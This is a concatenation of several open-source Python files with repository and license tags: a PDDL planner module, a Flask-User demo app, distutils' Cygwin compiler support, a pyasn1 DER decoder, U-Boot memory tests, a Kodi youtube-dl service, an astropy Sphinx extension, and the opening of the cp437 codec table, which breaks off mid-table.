return self.__class__.__name__
def instantiate(self, var_mapping, init_facts):
raise ValueError("Cannot instantiate condition: not normalized")
class NumericConstant(FunctionalExpression):
parts = ()
def __init__(self, value):
self.value = value
def __eq__(self, other):
return (self.__class__ == other.__class__ and self.value == other.value)
def __str__(self):
return "%s %s" % (self.__class__.__name__, self.value)
def _dump(self):
return str(self)
def instantiate(self, var_mapping, init_facts):
return self
class PrimitiveNumericExpression(FunctionalExpression):
parts = ()
def __init__(self, symbol, args):
self.symbol = symbol
self.args = tuple(args)
def __eq__(self, other):
if not (self.__class__ == other.__class__ and self.symbol == other.symbol
and len(self.args) == len(other.args)):
return False
else:
for s,o in zip(self.args, other.args):
if not s == o:
return False
return True
def __str__(self):
return "%s %s(%s)" % ("PNE", self.symbol, ", ".join(map(str, self.args)))
def dump(self, indent=" "):
print "%s%s" % (indent, self._dump())
for arg in self.args:
arg.dump(indent + " ")
def _dump(self):
return str(self)
def instantiate(self, var_mapping, init_facts):
args = [conditions.ObjectTerm(var_mapping.get(arg.name, arg.name)) for arg in self.args]
pne = PrimitiveNumericExpression(self.symbol, args)
assert not self.symbol == "total-cost"
# We know this expression is constant. Substitute it by corresponding
# initialization from task.
for fact in init_facts:
if isinstance(fact, FunctionAssignment):
if fact.fluent == pne:
return fact.expression
assert False, "Could not find instantiation for PNE!"
class FunctionAssignment(object):
def __init__(self, fluent, expression):
self.fluent = fluent
self.expression = expression
def __str__(self):
return "%s %s %s" % (self.__class__.__name__, self.fluent, self.expression)
def dump(self, indent=" "):
print "%s%s" % (indent, self._dump())
self.fluent.dump(indent + " ")
self.expression.dump(indent + " ")
def _dump(self):
return self.__class__.__name__
def instantiate(self, var_mapping, init_facts):
if not (isinstance(self.expression, PrimitiveNumericExpression) or
isinstance(self.expression, NumericConstant)):
raise ValueError("Cannot instantiate assignment: not normalized")
# We know that this assignment is a cost effect of an action (for initial state
# assignments, "instantiate" is not called). Hence, we know that the fluent is
# the 0-ary "total-cost" which does not need to be instantiated
assert self.fluent.symbol == "total-cost"
fluent = self.fluent
expression = self.expression.instantiate(var_mapping, init_facts)
return self.__class__(fluent, expression)
class Assign(FunctionAssignment):
def __str__(self):
return "%s := %s" % (self.fluent, self.expression)
class Increase(FunctionAssignment):
pass
| PlanTool/plantool | wrappingPlanners/Deterministic/LAMA/seq-sat-lama/lama/translate/pddl/f_expression.py | Python | gpl-2.0 | 5,321 |
import os
from flask import Flask, render_template_string, request
from flask_mail import Mail
from flask_sqlalchemy import SQLAlchemy
from flask_user import login_required, SQLAlchemyAdapter, UserManager, UserMixin
from flask_user import roles_required
# Use a Class-based config to avoid needing a 2nd file
# os.getenv() enables configuration through OS environment variables
class ConfigClass(object):
# Flask settings
SECRET_KEY = os.getenv('SECRET_KEY', 'THIS IS AN INSECURE SECRET')
SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL', 'sqlite:///single_file_app.sqlite')
CSRF_ENABLED = True
# Flask-Mail settings
MAIL_USERNAME = os.getenv('MAIL_USERNAME', '[email protected]')
MAIL_PASSWORD = os.getenv('MAIL_PASSWORD', 'password')
MAIL_DEFAULT_SENDER = os.getenv('MAIL_DEFAULT_SENDER', '"MyApp" <[email protected]>')
MAIL_SERVER = os.getenv('MAIL_SERVER', 'smtp.gmail.com')
MAIL_PORT = int(os.getenv('MAIL_PORT', '465'))
MAIL_USE_SSL = int(os.getenv('MAIL_USE_SSL', True))
# Flask-User settings
USER_APP_NAME = "AppName" # Used by email templates
def create_app(test_config=None): # For automated tests
# Setup Flask and read config from ConfigClass defined above
app = Flask(__name__)
app.config.from_object(__name__+'.ConfigClass')
# Load local_settings.py if file exists # For automated tests
try: app.config.from_object('local_settings')
except: pass
# Load optional test_config # For automated tests
if test_config:
app.config.update(test_config)
# Initialize Flask extensions
mail = Mail(app) # Initialize Flask-Mail
db = SQLAlchemy(app) # Initialize Flask-SQLAlchemy
# Define the User data model. Make sure to add flask.ext.user UserMixin!!
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
# User email information
email = db.Column(db.String(255), nullable=False, unique=True)
confirmed_at = db.Column(db.DateTime())
# User information
active = db.Column('is_active', db.Boolean(), nullable=False, server_default='0')
first_name = db.Column(db.String(100), nullable=False, server_default='')
last_name = db.Column(db.String(100), nullable=False, server_default='')
# Relationships
user_auth = db.relationship('UserAuth', uselist=False)
roles = db.relationship('Role', secondary='user_roles',
backref=db.backref('users', lazy='dynamic'))
# Define the UserAuth data model.
class UserAuth(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('user.id', ondelete='CASCADE'))
# User authentication information
username = db.Column(db.String(50), nullable=False, unique=True)
password = db.Column(db.String(255), nullable=False, server_default='')
reset_password_token = db.Column(db.String(100), nullable=False, server_default='')
# Relationships
user = db.relationship('User', uselist=False)
# Define the Role data model
class Role(db.Model):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(50), unique=True)
# Define the UserRoles data model
class UserRoles(db.Model):
id = db.Column(db.Integer(), primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('user.id', ondelete='CASCADE'))
role_id = db.Column(db.Integer(), db.ForeignKey('role.id', ondelete='CASCADE'))
    # Create all database tables
db.create_all()
# Setup Flask-User
db_adapter = SQLAlchemyAdapter(db, User, UserAuthClass=UserAuth)
user_manager = UserManager(db_adapter, app)
# Create 'user007' user with 'secret' and 'agent' roles
if not UserAuth.query.filter(UserAuth.username=='user007').first():
user1 = User(email='[email protected]', first_name='James', last_name='Bond', active=True)
db.session.add(user1)
user_auth1 = UserAuth(user=user1, username='user007',
password=user_manager.hash_password('Password1')
)
db.session.add(user_auth1)
user1.roles.append(Role(name='secret'))
user1.roles.append(Role(name='agent'))
db.session.commit()
# The Home page is accessible to anyone
@app.route('/')
def home_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Home page</h2>
<p>This page can be accessed by anyone.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
# The Members page is only accessible to authenticated users
@app.route('/members')
@login_required # Use of @login_required decorator
def members_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Members page</h2>
<p>This page can only be accessed by authenticated users.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
    # The Special page requires a user with 'secret' and 'sauce' roles or with 'secret' and 'agent' roles.
@app.route('/special')
@roles_required('secret', ['sauce', 'agent']) # Use of @roles_required decorator
def special_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Special Page</h2>
<p>This page can only be accessed by user007.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
return app
# Start development web server
if __name__=='__main__':
app = create_app()
app.run(host='0.0.0.0', port=5000, debug=True)
| jamescarignan/Flask-User | example_apps/user_auth_app.py | Python | bsd-2-clause | 6,986 |
"""distutils.cygwinccompiler
Provides the CygwinCCompiler class, a subclass of UnixCCompiler that
handles the Cygwin port of the GNU C compiler to Windows. It also contains
the Mingw32CCompiler class which handles the mingw32 port of GCC (same as
cygwin in no-cygwin mode).
"""
# problems:
#
# * if you use a msvc compiled python version (1.5.2)
# 1. you have to insert a __GNUC__ section in its config.h
# 2. you have to generate an import library for its dll
# - create a def-file for python??.dll
# - create an import library using
# dlltool --dllname python15.dll --def python15.def \
# --output-lib libpython15.a
#
# see also http://starship.python.net/crew/kernr/mingw32/Notes.html
#
# * We put export_symbols in a def-file, and don't use
# --export-all-symbols because it didn't work reliably in some
# tested configurations. And because other windows compilers also
# need their symbols specified, this is no serious problem.
#
# tested configurations:
#
# * cygwin gcc 2.91.57/ld 2.9.4/dllwrap 0.2.4 works
# (after patching python's config.h and for C++ some other include files)
# see also http://starship.python.net/crew/kernr/mingw32/Notes.html
# * mingw32 gcc 2.95.2/ld 2.9.4/dllwrap 0.2.4 works
# (ld doesn't support -shared, so we use dllwrap)
# * cygwin gcc 2.95.2/ld 2.10.90/dllwrap 2.10.90 works now
# - its dllwrap doesn't work, there is a bug in binutils 2.10.90
# see also http://sources.redhat.com/ml/cygwin/2000-06/msg01274.html
# - using gcc -mdll instead of dllwrap doesn't work without -static because
# it tries to link against dlls instead of their import libraries. (If
# it finds the dll first.)
# By specifying -static we force ld to link against the import libraries,
# this is windows standard and there are normally not the necessary symbols
# in the dlls.
# *** only the version of June 2000 shows these problems
# * cygwin gcc 3.2/ld 2.13.90 works
# (ld supports -shared)
# * mingw gcc 3.2/ld 2.13 works
# (ld supports -shared)
import os
import sys
import copy
from subprocess import Popen, PIPE, check_output
import re
from distutils.ccompiler import gen_preprocess_options, gen_lib_options
from distutils.unixccompiler import UnixCCompiler
from distutils.file_util import write_file
from distutils.errors import (DistutilsExecError, CCompilerError,
CompileError, UnknownFileError)
from distutils import log
from distutils.version import LooseVersion
from distutils.spawn import find_executable
def get_msvcr():
"""Include the appropriate MSVC runtime library if Python was built
with MSVC 7.0 or later.
"""
msc_pos = sys.version.find('MSC v.')
if msc_pos != -1:
msc_ver = sys.version[msc_pos+6:msc_pos+10]
if msc_ver == '1300':
# MSVC 7.0
return ['msvcr70']
elif msc_ver == '1310':
# MSVC 7.1
return ['msvcr71']
elif msc_ver == '1400':
# VS2005 / MSVC 8.0
return ['msvcr80']
elif msc_ver == '1500':
# VS2008 / MSVC 9.0
return ['msvcr90']
elif msc_ver == '1600':
# VS2010 / MSVC 10.0
return ['msvcr100']
else:
raise ValueError("Unknown MS Compiler version %s " % msc_ver)
class CygwinCCompiler(UnixCCompiler):
""" Handles the Cygwin port of the GNU C compiler to Windows.
"""
compiler_type = 'cygwin'
obj_extension = ".o"
static_lib_extension = ".a"
shared_lib_extension = ".dll"
static_lib_format = "lib%s%s"
shared_lib_format = "%s%s"
exe_extension = ".exe"
def __init__(self, verbose=0, dry_run=0, force=0):
UnixCCompiler.__init__(self, verbose, dry_run, force)
status, details = check_config_h()
self.debug_print("Python's GCC status: %s (details: %s)" %
(status, details))
if status is not CONFIG_H_OK:
self.warn(
"Python's pyconfig.h doesn't seem to support your compiler. "
"Reason: %s. "
"Compiling may fail because of undefined preprocessor macros."
% details)
self.gcc_version, self.ld_version, self.dllwrap_version = \
get_versions()
self.debug_print(self.compiler_type + ": gcc %s, ld %s, dllwrap %s\n" %
(self.gcc_version,
self.ld_version,
self.dllwrap_version) )
# ld_version >= "2.10.90" and < "2.13" should also be able to use
# gcc -mdll instead of dllwrap
# Older dllwraps had own version numbers, newer ones use the
# same as the rest of binutils ( also ld )
# dllwrap 2.10.90 is buggy
if self.ld_version >= "2.10.90":
self.linker_dll = "gcc"
else:
self.linker_dll = "dllwrap"
# ld_version >= "2.13" support -shared so use it instead of
# -mdll -static
if self.ld_version >= "2.13":
shared_option = "-shared"
else:
shared_option = "-mdll -static"
# Hard-code GCC because that's what this is all about.
# XXX optimization, warnings etc. should be customizable.
self.set_executables(compiler='gcc -mcygwin -O -Wall',
compiler_so='gcc -mcygwin -mdll -O -Wall',
compiler_cxx='g++ -mcygwin -O -Wall',
linker_exe='gcc -mcygwin',
linker_so=('%s -mcygwin %s' %
(self.linker_dll, shared_option)))
# cygwin and mingw32 need different sets of libraries
if self.gcc_version == "2.91.57":
# cygwin shouldn't need msvcrt, but without the dlls will crash
# (gcc version 2.91.57) -- perhaps something about initialization
self.dll_libraries=["msvcrt"]
self.warn(
"Consider upgrading to a newer version of gcc")
else:
# Include the appropriate MSVC runtime library if Python was built
# with MSVC 7.0 or later.
self.dll_libraries = get_msvcr()
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
"""Compiles the source by spawning GCC and windres if needed."""
if ext == '.rc' or ext == '.res':
# gcc needs '.res' and '.rc' compiled to object files !!!
try:
self.spawn(["windres", "-i", src, "-o", obj])
except DistutilsExecError as msg:
raise CompileError(msg)
else: # for other files use the C-compiler
try:
self.spawn(self.compiler_so + cc_args + [src, '-o', obj] +
extra_postargs)
except DistutilsExecError as msg:
raise CompileError(msg)
def link(self, target_desc, objects, output_filename, output_dir=None,
libraries=None, library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None):
"""Link the objects."""
# use separate copies, so we can modify the lists
extra_preargs = copy.copy(extra_preargs or [])
libraries = copy.copy(libraries or [])
objects = copy.copy(objects or [])
# Additional libraries
libraries.extend(self.dll_libraries)
# handle export symbols by creating a def-file
# with executables this only works with gcc/ld as linker
if ((export_symbols is not None) and
(target_desc != self.EXECUTABLE or self.linker_dll == "gcc")):
# (The linker doesn't do anything if output is up-to-date.
# So it would probably better to check if we really need this,
# but for this we had to insert some unchanged parts of
# UnixCCompiler, and this is not what we want.)
# we want to put some files in the same directory as the
# object files are, build_temp doesn't help much
# where are the object files
temp_dir = os.path.dirname(objects[0])
# name of dll to give the helper files the same base name
(dll_name, dll_extension) = os.path.splitext(
os.path.basename(output_filename))
# generate the filenames for these files
def_file = os.path.join(temp_dir, dll_name + ".def")
lib_file = os.path.join(temp_dir, 'lib' + dll_name + ".a")
# Generate .def file
contents = [
"LIBRARY %s" % os.path.basename(output_filename),
"EXPORTS"]
for sym in export_symbols:
contents.append(sym)
self.execute(write_file, (def_file, contents),
"writing %s" % def_file)
# next add options for def-file and to creating import libraries
# dllwrap uses different options than gcc/ld
if self.linker_dll == "dllwrap":
extra_preargs.extend(["--output-lib", lib_file])
# for dllwrap we have to use a special option
extra_preargs.extend(["--def", def_file])
# we use gcc/ld here and can be sure ld is >= 2.9.10
else:
# doesn't work: bfd_close build\...\libfoo.a: Invalid operation
#extra_preargs.extend(["-Wl,--out-implib,%s" % lib_file])
# for gcc/ld the def-file is specified as any object files
objects.append(def_file)
#end: if ((export_symbols is not None) and
# (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")):
# who wants symbols and a many times larger output file
# should explicitly switch the debug mode on
# otherwise we let dllwrap/ld strip the output file
# (On my machine: 10KiB < stripped_file < ??100KiB
# unstripped_file = stripped_file + XXX KiB
# ( XXX=254 for a typical python extension))
if not debug:
extra_preargs.append("-s")
UnixCCompiler.link(self, target_desc, objects, output_filename,
output_dir, libraries, library_dirs,
runtime_library_dirs,
None, # export_symbols, we do this in our def-file
debug, extra_preargs, extra_postargs, build_temp,
target_lang)
# -- Miscellaneous methods -----------------------------------------
def object_filenames(self, source_filenames, strip_dir=0, output_dir=''):
"""Adds supports for rc and res files."""
if output_dir is None:
output_dir = ''
obj_names = []
for src_name in source_filenames:
# use normcase to make sure '.rc' is really '.rc' and not '.RC'
base, ext = os.path.splitext(os.path.normcase(src_name))
if ext not in (self.src_extensions + ['.rc','.res']):
raise UnknownFileError("unknown file type '%s' (from '%s')" % \
(ext, src_name))
if strip_dir:
base = os.path.basename (base)
if ext in ('.res', '.rc'):
# these need to be compiled to object files
obj_names.append (os.path.join(output_dir,
base + ext + self.obj_extension))
else:
obj_names.append (os.path.join(output_dir,
base + self.obj_extension))
return obj_names
# the same as cygwin plus some additional parameters
class Mingw32CCompiler(CygwinCCompiler):
""" Handles the Mingw32 port of the GNU C compiler to Windows.
"""
compiler_type = 'mingw32'
def __init__(self, verbose=0, dry_run=0, force=0):
CygwinCCompiler.__init__ (self, verbose, dry_run, force)
# ld_version >= "2.13" support -shared so use it instead of
# -mdll -static
if self.ld_version >= "2.13":
shared_option = "-shared"
else:
shared_option = "-mdll -static"
# A real mingw32 doesn't need to specify a different entry point,
# but cygwin 2.91.57 in no-cygwin-mode needs it.
if self.gcc_version <= "2.91.57":
entry_point = '--entry _DllMain@12'
else:
entry_point = ''
if is_cygwingcc():
raise CCompilerError(
'Cygwin gcc cannot be used with --compiler=mingw32')
self.set_executables(compiler='gcc -O -Wall',
compiler_so='gcc -mdll -O -Wall',
compiler_cxx='g++ -O -Wall',
linker_exe='gcc',
linker_so='%s %s %s'
% (self.linker_dll, shared_option,
entry_point))
# Maybe we should also append -mthreads, but then the finished
# dlls need another dll (mingwm10.dll see Mingw32 docs)
# (-mthreads: Support thread-safe exception handling on `Mingw32')
# no additional libraries needed
self.dll_libraries=[]
# Include the appropriate MSVC runtime library if Python was built
# with MSVC 7.0 or later.
self.dll_libraries = get_msvcr()
# Because these compilers aren't configured in Python's pyconfig.h file by
# default, we should at least warn the user if he is using an unmodified
# version.
CONFIG_H_OK = "ok"
CONFIG_H_NOTOK = "not ok"
CONFIG_H_UNCERTAIN = "uncertain"
def check_config_h():
"""Check if the current Python installation appears amenable to building
extensions with GCC.
Returns a tuple (status, details), where 'status' is one of the following
constants:
- CONFIG_H_OK: all is well, go ahead and compile
- CONFIG_H_NOTOK: doesn't look good
- CONFIG_H_UNCERTAIN: not sure -- unable to read pyconfig.h
'details' is a human-readable string explaining the situation.
Note there are two ways to conclude "OK": either 'sys.version' contains
the string "GCC" (implying that this Python was built with GCC), or the
installed "pyconfig.h" contains the string "__GNUC__".
"""
# XXX since this function also checks sys.version, it's not strictly a
# "pyconfig.h" check -- should probably be renamed...
from distutils import sysconfig
# if sys.version contains GCC then python was compiled with GCC, and the
# pyconfig.h file should be OK
if "GCC" in sys.version:
return CONFIG_H_OK, "sys.version mentions 'GCC'"
# let's see if __GNUC__ is mentioned in python.h
fn = sysconfig.get_config_h_filename()
try:
config_h = open(fn)
try:
if "__GNUC__" in config_h.read():
return CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn
else:
return CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn
finally:
config_h.close()
except OSError as exc:
return (CONFIG_H_UNCERTAIN,
"couldn't read '%s': %s" % (fn, exc.strerror))
RE_VERSION = re.compile(br'(\d+\.\d+(\.\d+)*)')
def _find_exe_version(cmd):
"""Find the version of an executable by running `cmd` in the shell.
If the command is not found, or the output does not match
`RE_VERSION`, returns None.
"""
executable = cmd.split()[0]
if find_executable(executable) is None:
return None
out = Popen(cmd, shell=True, stdout=PIPE).stdout
try:
out_string = out.read()
finally:
out.close()
result = RE_VERSION.search(out_string)
if result is None:
return None
# LooseVersion works with strings
# so we need to decode our bytes
return LooseVersion(result.group(1).decode())
def get_versions():
""" Try to find out the versions of gcc, ld and dllwrap.
If not possible it returns None for it.
"""
commands = ['gcc -dumpversion', 'ld -v', 'dllwrap --version']
return tuple([_find_exe_version(cmd) for cmd in commands])
def is_cygwingcc():
'''Try to determine if the gcc that would be used is from cygwin.'''
out_string = check_output(['gcc', '-dumpmachine'])
return out_string.strip().endswith(b'cygwin')
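# Example (illustrative): a Cygwin-targeted gcc prints a machine triple such
# as "i686-pc-cygwin" for `gcc -dumpmachine`, so is_cygwingcc() returns True.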
| xyuanmu/XX-Net | python3.8.2/Lib/distutils/cygwinccompiler.py | Python | bsd-2-clause | 16,478 |
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, Ilya Etingof <[email protected]>
# License: http://pyasn1.sf.net/license.html
#
from pyasn1.type import univ
from pyasn1.codec.cer import decoder
__all__ = ['decode']
class BitStringDecoder(decoder.BitStringDecoder):
supportConstructedForm = False
class OctetStringDecoder(decoder.OctetStringDecoder):
supportConstructedForm = False
# TODO: prohibit non-canonical encoding
RealDecoder = decoder.RealDecoder
tagMap = decoder.tagMap.copy()
tagMap.update(
{univ.BitString.tagSet: BitStringDecoder(),
univ.OctetString.tagSet: OctetStringDecoder(),
univ.Real.tagSet: RealDecoder()}
)
typeMap = decoder.typeMap.copy()
# Put in non-ambiguous types for faster codec lookup
for typeDecoder in tagMap.values():
if typeDecoder.protoComponent is not None:
typeId = typeDecoder.protoComponent.__class__.typeId
if typeId is not None and typeId not in typeMap:
typeMap[typeId] = typeDecoder
class Decoder(decoder.Decoder):
supportIndefLength = False
#: Turns DER octet stream into an ASN.1 object.
#:
#: Takes DER octetstream and decode it into an ASN.1 object
#: (e.g. :py:class:`~pyasn1.type.base.PyAsn1Item` derivative) which
#: may be a scalar or an arbitrary nested structure.
#:
#: Parameters
#: ----------
#: substrate: :py:class:`bytes` (Python 3) or :py:class:`str` (Python 2)
#: DER octetstream
#:
#: asn1Spec: any pyasn1 type object e.g. :py:class:`~pyasn1.type.base.PyAsn1Item` derivative
#: A pyasn1 type object to act as a template guiding the decoder. Depending on the ASN.1 structure
#: being decoded, *asn1Spec* may or may not be required. The most common reason
#: it is required is that the ASN.1 structure is encoded in *IMPLICIT* tagging mode.
#:
#: Returns
#: -------
#: : :py:class:`tuple`
#: A tuple of pyasn1 object recovered from DER substrate (:py:class:`~pyasn1.type.base.PyAsn1Item` derivative)
#: and the unprocessed trailing portion of the *substrate* (may be empty)
#:
#: Raises
#: ------
#: : :py:class:`pyasn1.error.PyAsn1Error`
#: On decoding errors
decode = Decoder(tagMap, typeMap)
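if __name__ == '__main__':
    # Illustrative sketch, not part of the original pyasn1 module: decode a
    # DER-encoded INTEGER.  b'\x02\x01\x0c' is tag 02 (INTEGER), length 1,
    # payload 0x0c, i.e. the value 12; the unprocessed trailing substrate
    # is empty.
    value, rest = decode(b'\x02\x01\x0c')
    print(value, rest)  # -> 12 b''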
| saurabhbajaj207/CarpeDiem | venv/Lib/site-packages/pyasn1/codec/der/decoder.py | Python | mit | 2,169 |
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2015 Stephen Warren
# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.
import pytest
import u_boot_utils
@pytest.mark.buildconfigspec('cmd_memory')
def test_md(u_boot_console):
"""Test that md reads memory as expected, and that memory can be modified
using the mw command."""
ram_base = u_boot_utils.find_ram_base(u_boot_console)
addr = '%08x' % ram_base
val = 'a5f09876'
expected_response = addr + ': ' + val
u_boot_console.run_command('mw ' + addr + ' 0 10')
response = u_boot_console.run_command('md ' + addr + ' 10')
assert(not (expected_response in response))
u_boot_console.run_command('mw ' + addr + ' ' + val)
response = u_boot_console.run_command('md ' + addr + ' 10')
assert(expected_response in response)
@pytest.mark.buildconfigspec('cmd_memory')
def test_md_repeat(u_boot_console):
"""Test command repeat (via executing an empty command) operates correctly
for "md"; the command must repeat and dump an incrementing address."""
ram_base = u_boot_utils.find_ram_base(u_boot_console)
addr_base = '%08x' % ram_base
words = 0x10
addr_repeat = '%08x' % (ram_base + (words * 4))
u_boot_console.run_command('md %s %x' % (addr_base, words))
response = u_boot_console.run_command('')
expected_response = addr_repeat + ': '
assert(expected_response in response)
| Digilent/u-boot-digilent | test/py/tests/test_md.py | Python | gpl-2.0 | 1,426 |
# -*- coding: utf-8 -*-
import sys
import json
import binascii
import xbmc
from lib.yd_private_libs import util, servicecontrol, jsonqueue
sys.path.insert(0, util.MODULE_PATH)
import YDStreamExtractor # noqa E402
import threading # noqa E402
class Service(xbmc.Monitor):
def __init__(self):
self.downloadCount = 0
self.controller = servicecontrol.ServiceControl()
self.start()
def onNotification(self, sender, method, data):
if not sender == 'script.module.youtube.dl':
return
self.processCommand(method.split('.', 1)[-1], self.controller.processCommandData(data)) # Remove the "Other." prefix
def processCommand(self, command, args):
if command == 'DOWNLOAD_STOP':
YDStreamExtractor._cancelDownload()
def getNextQueuedDownload(self):
try:
dataHEX = jsonqueue.XBMCJsonRAFifoQueue(util.QUEUE_FILE).pop()
if not dataHEX:
return None
dataJSON = binascii.unhexlify(dataHEX)
self.downloadCount += 1
util.LOG('Loading from queue. #{0} this session'.format(self.downloadCount))
return json.loads(dataJSON)
        except Exception:
import traceback
traceback.print_exc()
return None
def start(self):
if self.controller.status == 'ACTIVE':
return
try:
self.controller.status = 'ACTIVE'
self._start()
finally:
self.controller.status = ''
def _start(self):
util.LOG('DOWNLOAD SERVICE: START')
info = self.getNextQueuedDownload()
while info and not xbmc.abortRequested:
t = threading.Thread(target=YDStreamExtractor._handleDownload, args=(
info['data'],), kwargs={'path': info['path'], 'duration': info['duration'], 'bg': True})
t.start()
while t.isAlive() and not xbmc.abortRequested:
xbmc.sleep(100)
info = self.getNextQueuedDownload()
util.LOG('DOWNLOAD SERVICE: FINISHED')
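# Illustrative note, not part of the original add-on: each queue entry popped
# in getNextQueuedDownload() above is hex-encoded JSON, so the producer side
# presumably builds items roughly like this (push() is an assumption -- only
# pop() is visible here):
#
#   payload = json.dumps({'data': info, 'path': dest, 'duration': secs})
#   jsonqueue.XBMCJsonRAFifoQueue(util.QUEUE_FILE).push(binascii.hexlify(payload))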
Service()
| mrquim/mrquimrepo | script.module.youtube.dl/service.py | Python | gpl-2.0 | 2,091 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This sphinx extension builds on `sphinx.ext.autosummary` to
clean up some issues it presents in the Astropy docs.
The main issue this fixes is the summary tables getting cut off before the
end of the sentence in some cases.
Note: Sphinx 1.2 appears to have fixed the main issues in the stock
autosummary extension that are addressed by this extension. So use of this
extension with newer versions of Sphinx is deprecated.
"""
import re
from distutils.version import LooseVersion
import sphinx
from sphinx.ext.autosummary import Autosummary
from ...utils import deprecated
# used in AstropyAutosummary.get_items
_itemsummrex = re.compile(r'^([A-Z].*?\.(?:\s|$))')
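# (captures the first sentence of a docstring: for "Returns the mean. See
#  also median." it yields "Returns the mean. ", stripped by the caller)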
@deprecated('1.0', message='AstropyAutosummary is only needed when used '
'with Sphinx versions less than 1.2')
class AstropyAutosummary(Autosummary):
def get_items(self, names):
"""Try to import the given names, and return a list of
``[(name, signature, summary_string, real_name), ...]``.
"""
from sphinx.ext.autosummary import (get_import_prefixes_from_env,
import_by_name, get_documenter, mangle_signature)
env = self.state.document.settings.env
prefixes = get_import_prefixes_from_env(env)
items = []
max_item_chars = 50
for name in names:
display_name = name
if name.startswith('~'):
name = name[1:]
display_name = name.split('.')[-1]
try:
import_by_name_values = import_by_name(name, prefixes=prefixes)
except ImportError:
self.warn('[astropyautosummary] failed to import %s' % name)
items.append((name, '', '', name))
continue
# to accommodate Sphinx v1.2.2 and v1.2.3
if len(import_by_name_values) == 3:
real_name, obj, parent = import_by_name_values
elif len(import_by_name_values) == 4:
real_name, obj, parent, module_name = import_by_name_values
# NB. using real_name here is important, since Documenters
# handle module prefixes slightly differently
documenter = get_documenter(obj, parent)(self, real_name)
if not documenter.parse_name():
self.warn('[astropyautosummary] failed to parse name %s' % real_name)
items.append((display_name, '', '', real_name))
continue
if not documenter.import_object():
self.warn('[astropyautosummary] failed to import object %s' % real_name)
items.append((display_name, '', '', real_name))
continue
# -- Grab the signature
sig = documenter.format_signature()
if not sig:
sig = ''
else:
max_chars = max(10, max_item_chars - len(display_name))
sig = mangle_signature(sig, max_chars=max_chars)
sig = sig.replace('*', r'\*')
# -- Grab the summary
doc = list(documenter.process_doc(documenter.get_doc()))
while doc and not doc[0].strip():
doc.pop(0)
m = _itemsummrex.search(" ".join(doc).strip())
if m:
summary = m.group(1).strip()
elif doc:
summary = doc[0].strip()
else:
summary = ''
items.append((display_name, sig, summary, real_name))
return items
def setup(app):
# need autosummary, of course
app.setup_extension('sphinx.ext.autosummary')
# Don't make the replacement if Sphinx is at least 1.2
if LooseVersion(sphinx.__version__) < LooseVersion('1.2.0'):
# this replaces the default autosummary with the astropy one
app.add_directive('autosummary', AstropyAutosummary)
| Jerryzcn/Mmani | doc/sphinxext/numpy_ext/astropyautosummary.py | Python | bsd-2-clause | 3,983 |
""" Python Character Mapping Codec cp437 generated from 'VENDORS/MICSFT/PC/CP437.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp437',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00e5, # LATIN SMALL LETTER A WITH RING ABOVE
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00eb, # LATIN SMALL LETTER E WITH DIAERESIS
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00ef, # LATIN SMALL LETTER I WITH DIAERESIS
0x008c: 0x00ee, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x008d: 0x00ec, # LATIN SMALL LETTER I WITH GRAVE
